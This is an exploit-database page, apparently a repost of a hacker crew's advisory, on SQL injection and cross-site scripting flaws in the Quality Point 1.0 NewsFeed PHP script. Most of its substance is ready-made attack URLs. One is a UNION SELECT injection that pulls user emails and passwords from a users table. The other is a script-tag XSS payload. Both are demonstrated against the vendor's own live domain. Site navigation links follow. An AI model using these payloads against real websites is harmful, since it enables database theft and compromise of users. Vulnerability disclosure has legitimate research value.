Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities

Tekst :

sEc-r1z crEw The Leaders for Penetration Testing In Middle East.
================+

[?] ~ Note : sEc-r1z CrEw# r0x !
==========
[?] Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote
Vulnerabilities
==========
[?] My home: [ http://sec-r1z.com ]
[?] For Ask: [r-d@passport.com]
[?] Script: [ Quality Point 1.0 ]
[?] home Script [ http://qualitypointtech.net ]
[?] Language: [ PHP ]
[?[ Best WishEs : [ The Love is End ... ]
[?] Founder: [ Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# CrEw - Mr.Tro0oqy - r1z -
Sas-TerrOrisT And All My Frindes ]
########################################################################

===[ Exploit SQL ]===

[»]Exploit :

path/showPage.php?id=[SQL injection ]

[>>] Demo :

http://qualitypointtech.net/NewsFeed/showPage.php?id=-348+union+select+1,co
ncat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.us
ers%20--

------------
===[ Exploit XSS ]===

[»]Exploit :

showPage.php?id=[XSS]

[>>] Demo :

http://qualitypointtech.net/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealer
t%281%29;%3C/script%3E

-----------------------

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache HTTP Server Denial
of Service Vulnerability

Multiple Vendors
libc/fnmatch(3) DoS (incl
apache poc)

Apache Continuum
cross-site scripting
vulnerability

Apache Tomcat DoS
Vulnerability

PHP Hashtables Denial of
Service

PHP 5.3.6 multiple null
pointer dereference

PHP 5.3.6 ZipArchive
invalid use glob(3)

libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)